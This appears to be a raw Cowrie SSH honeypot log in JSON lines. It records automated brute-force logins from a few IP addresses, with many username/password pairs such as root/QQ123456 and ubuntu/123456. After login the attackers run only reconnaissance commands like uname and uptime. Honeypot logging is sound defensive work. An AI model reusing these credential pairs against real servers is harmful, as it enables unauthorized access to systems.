{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:48:27.709718Z","src_ip":"194.233.79.134","session":"8df9d802177e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:48:27.710393Z","src_ip":"194.233.79.134","session":"8df9d802177e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:48:27.916574Z","src_ip":"194.233.79.134","session":"8df9d802177e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:48:27.917722Z","src_ip":"194.233.79.134","session":"8df9d802177e"}
{"eventid":"cowrie.session.closed","duration":31.46237540245056,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:48:32.059827Z","src_ip":"212.227.125.160","session":"c9154f0d9a6e"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":49103,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1be1d1f4614","protocol":"ssh","message":"New connection: 45.125.211.194:49103 (1.2.3.4:22) [session: c1be1d1f4614]","sensor":"my-vps","timestamp":"2025-08-28T03:48:38.305185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:48:38.314109Z","src_ip":"45.125.211.194","session":"c1be1d1f4614"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:48:38.514413Z","src_ip":"45.125.211.194","session":"c1be1d1f4614"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:48:39.351478Z","src_ip":"45.125.211.194","session":"c1be1d1f4614"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:48:39.859024Z","src_ip":"45.125.211.194","session":"c1be1d1f4614"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:48:39.859802Z","src_ip":"45.125.211.194","session":"c1be1d1f4614"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:48:40.070281Z","src_ip":"45.125.211.194","session":"c1be1d1f4614"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:48:40.071460Z","src_ip":"45.125.211.194","session":"c1be1d1f4614"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":19644,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0a432235a50","protocol":"ssh","message":"New connection: 45.125.211.194:19644 (1.2.3.4:22) [session: f0a432235a50]","sensor":"my-vps","timestamp":"2025-08-28T03:48:53.124590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:48:53.138742Z","src_ip":"45.125.211.194","session":"f0a432235a50"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:48:53.334391Z","src_ip":"45.125.211.194","session":"f0a432235a50"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"svnuser","message":"login attempt [svnuser/svnuser] failed","sensor":"my-vps","timestamp":"2025-08-28T03:48:54.165090Z","src_ip":"45.125.211.194","session":"f0a432235a50"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:48:55.374639Z","src_ip":"45.125.211.194","session":"f0a432235a50"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":49228,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e14116cbd05","protocol":"ssh","message":"New connection: 45.125.211.194:49228 (1.2.3.4:22) [session: 8e14116cbd05]","sensor":"my-vps","timestamp":"2025-08-28T03:49:07.829316Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:49:07.848631Z","src_ip":"45.125.211.194","session":"8e14116cbd05"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:49:08.038424Z","src_ip":"45.125.211.194","session":"8e14116cbd05"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:49:08.869522Z","src_ip":"45.125.211.194","session":"8e14116cbd05"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:49:10.079456Z","src_ip":"45.125.211.194","session":"8e14116cbd05"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":58012,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c999986c125","protocol":"ssh","message":"New connection: 45.125.211.194:58012 (1.2.3.4:22) [session: 4c999986c125]","sensor":"my-vps","timestamp":"2025-08-28T03:49:22.827924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:49:22.834436Z","src_ip":"45.125.211.194","session":"4c999986c125"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:49:23.042004Z","src_ip":"45.125.211.194","session":"4c999986c125"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:49:23.874956Z","src_ip":"45.125.211.194","session":"4c999986c125"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:49:25.086379Z","src_ip":"45.125.211.194","session":"4c999986c125"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":16705,"dst_ip":"1.2.3.4","dst_port":22,"session":"dac2ce10f6ff","protocol":"ssh","message":"New connection: 45.125.211.194:16705 (1.2.3.4:22) [session: dac2ce10f6ff]","sensor":"my-vps","timestamp":"2025-08-28T03:49:37.582352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:49:37.600107Z","src_ip":"45.125.211.194","session":"dac2ce10f6ff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:49:37.803584Z","src_ip":"45.125.211.194","session":"dac2ce10f6ff"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456","message":"login attempt [root/QQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:49:38.632330Z","src_ip":"45.125.211.194","session":"dac2ce10f6ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:49:39.118117Z","src_ip":"45.125.211.194","session":"dac2ce10f6ff"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:49:39.118889Z","src_ip":"45.125.211.194","session":"dac2ce10f6ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:49:39.345724Z","src_ip":"45.125.211.194","session":"dac2ce10f6ff"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:49:39.346857Z","src_ip":"45.125.211.194","session":"dac2ce10f6ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":12465,"dst_ip":"1.2.3.4","dst_port":22,"session":"54c3dcbfe8ca","protocol":"ssh","message":"New connection: 212.227.235.229:12465 (1.2.3.4:22) [session: 54c3dcbfe8ca]","sensor":"my-vps","timestamp":"2025-08-28T03:49:51.740724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:49:51.800331Z","src_ip":"212.227.235.229","session":"54c3dcbfe8ca"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:49:52.057381Z","src_ip":"212.227.235.229","session":"54c3dcbfe8ca"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":26658,"dst_ip":"1.2.3.4","dst_port":22,"session":"27a9e18fd97b","protocol":"ssh","message":"New connection: 45.125.211.194:26658 (1.2.3.4:22) [session: 27a9e18fd97b]","sensor":"my-vps","timestamp":"2025-08-28T03:49:52.383419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:49:52.404556Z","src_ip":"45.125.211.194","session":"27a9e18fd97b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:49:52.592799Z","src_ip":"45.125.211.194","session":"27a9e18fd97b"}
{"eventid":"cowrie.login.success","username":"root","password":"088863222*!!!@","message":"login attempt [root/088863222*!!!@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:49:53.422087Z","src_ip":"212.227.235.229","session":"54c3dcbfe8ca"}
{"eventid":"cowrie.login.failed","username":"esadmin","password":"esadmin","message":"login attempt [esadmin/esadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T03:49:53.423972Z","src_ip":"45.125.211.194","session":"27a9e18fd97b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:49:54.633867Z","src_ip":"45.125.211.194","session":"27a9e18fd97b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:49:54.899957Z","src_ip":"212.227.235.229","session":"54c3dcbfe8ca"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-28T03:49:54.900651Z","src_ip":"212.227.235.229","session":"54c3dcbfe8ca"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":38924,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1a3b36d63da","protocol":"ssh","message":"New connection: 194.233.79.134:38924 (1.2.3.4:22) [session: d1a3b36d63da]","sensor":"my-vps","timestamp":"2025-08-28T03:49:55.107514Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:49:55.651189Z","src_ip":"212.227.235.229","session":"54c3dcbfe8ca"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:49:55.828802Z","src_ip":"194.233.79.134","session":"d1a3b36d63da"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:49:55.830040Z","src_ip":"194.233.79.134","session":"d1a3b36d63da"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:49:56.041916Z","src_ip":"212.227.235.229","session":"54c3dcbfe8ca"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:49:57.564573Z","src_ip":"194.233.79.134","session":"d1a3b36d63da"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:49:59.904233Z","src_ip":"194.233.79.134","session":"d1a3b36d63da"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:49:59.905112Z","src_ip":"194.233.79.134","session":"d1a3b36d63da"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:50:00.476365Z","src_ip":"194.233.79.134","session":"d1a3b36d63da"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:50:00.477462Z","src_ip":"194.233.79.134","session":"d1a3b36d63da"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":46911,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2adede6864a","protocol":"ssh","message":"New connection: 45.125.211.194:46911 (1.2.3.4:22) [session: b2adede6864a]","sensor":"my-vps","timestamp":"2025-08-28T03:50:07.299220Z"}
